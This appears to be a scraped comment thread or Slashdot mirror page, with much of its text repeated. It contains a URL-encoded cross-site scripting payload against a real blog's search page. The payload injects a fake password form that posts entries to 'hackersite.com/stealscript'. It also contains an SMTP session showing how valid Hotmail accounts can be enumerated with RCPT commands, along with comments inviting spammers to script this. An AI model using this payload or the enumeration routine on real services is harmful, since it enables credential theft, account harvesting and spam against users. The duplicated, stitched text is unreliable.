Note: if you are actually a member, please do not input your password. This is merely an XSS trick demonstrating a total lack of vulberability, sloppy coding or naivety on the part of neosmart.
I have recently audited an xserver running the latest Jaguar. Within the first 20 minutes of looking, I found 3 command-line overflows for suid apps.
These are textbook overflows and appear to be trivial to exploit. IMHO the developers have performed very little vulnerability (fuzz) testing against their privileged applications and services. Many many more bugs will be found.
I encourage any newbie vulnerability researchers to get their hands on a copy of Jaguar ASAP. As mentioned in a previous post, file permissions are screwed up all over the system, and the amount of suid binaries is astonishing. You *will* find *many* vulnerabilities.
Surely more than just a handful of spammers know that Hotmails smtp servers are vulnerable to RCPT brute forcing of valid accounts?
Observe:
220 mc5-f36.law1.hotmail.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5600 ready helo slashdot.org 250 mc5-f36.law1.hotmail.com Hello [] mail from: <humanaut@nowhere.com> 250 humanaut@nowhere.com....Sender OK rcpt to: <nosuchhotmailuser@hotmail.com> 550 Requested action not taken: mailbox unavailable rcpt to: <dennis@hotmail.com> 250 dennis@hotmail.com rpct to: <fred@hotmail.com> 250 fred@hotmail.com rcpt to: <vndsad@hotmail.com> 550 Requested action not taken: mailbox unavailable
There are numerous scripts and exe's (probably) around to automate this procedure - I'm sure I've seen a mass mailer program or two that mentioned expn/vrfy/rcpt verification or brute forcing..
That is why, IMO, everyone with a short or simple username at hotmail receives so much spam! I'm sure Hotmail/MSN have been warned numerous times, and I guarantee there are hordes of spammers hammering away with RCPT brute forcers at those boxes 24/7.
Anyway.. any average scripter should be able to knock something up to feed a list of usernames through the helo/mailfrom/rcptto routine.. and I'm sure most seasoned spammers are average scripters.
Slashdot Mirror
well how about that.
% 3Cbr+%2F%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.alan-alda .com%2Falan-alda.jpg%3E%3Cbr+%2F%3E%3Ch2%3EWelcome +to+the+Alan+Alda+fanclub.+Please+enter+your+passw ord.%3C%2Fh2%3E%3Cform+id%3D%22searchform%22+metho d%3D%22get%22+action%3D%22http%3A%2F%2Fwww.hackers ite.com%2Fstealscript%22%3E%3Cinput+type%3D%22text %22+name%3D%22s%22+id%3D%22s%22+size%3D%2215%22+%2 F%3E%3Cbr+%2F%3E%3Cinput+type%3D%22submit%22+value %3D%22Submit%22+%2F%3E%3C%2Fform%3E%3Cbr+%2F%3E
http://neosmart.net/blog/index.php?s=%3Cbr+%2F%3E
Note: if you are actually a member, please do not input your password. This is merely an XSS trick demonstrating a total lack of vulberability, sloppy coding or naivety on the part of neosmart.
I have recently audited an xserver running the latest Jaguar. Within the first 20 minutes of looking, I found 3 command-line overflows for suid apps. These are textbook overflows and appear to be trivial to exploit. IMHO the developers have performed very little vulnerability (fuzz) testing against their privileged applications and services. Many many more bugs will be found. I encourage any newbie vulnerability researchers to get their hands on a copy of Jaguar ASAP. As mentioned in a previous post, file permissions are screwed up all over the system, and the amount of suid binaries is astonishing. You *will* find *many* vulnerabilities.
Surely more than just a handful of spammers know that Hotmails smtp servers are vulnerable to RCPT brute forcing of valid accounts?
Observe:
220 mc5-f36.law1.hotmail.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5600 ready
helo slashdot.org
250 mc5-f36.law1.hotmail.com Hello []
mail from: <humanaut@nowhere.com>
250 humanaut@nowhere.com....Sender OK
rcpt to: <nosuchhotmailuser@hotmail.com>
550 Requested action not taken: mailbox unavailable
rcpt to: <dennis@hotmail.com>
250 dennis@hotmail.com
rpct to: <fred@hotmail.com>
250 fred@hotmail.com
rcpt to: <vndsad@hotmail.com>
550 Requested action not taken: mailbox unavailable
There are numerous scripts and exe's (probably) around to automate this procedure - I'm sure I've seen a mass mailer program or two that mentioned expn/vrfy/rcpt verification or brute forcing..
That is why, IMO, everyone with a short or simple username at hotmail receives so much spam! I'm sure Hotmail/MSN have been warned numerous times, and I guarantee there are hordes of spammers hammering away with RCPT brute forcers at those boxes 24/7.
Anyway.. any average scripter should be able to knock something up to feed a list of usernames through the helo/mailfrom/rcptto routine.. and I'm sure most seasoned spammers are average scripters.
.humanaut.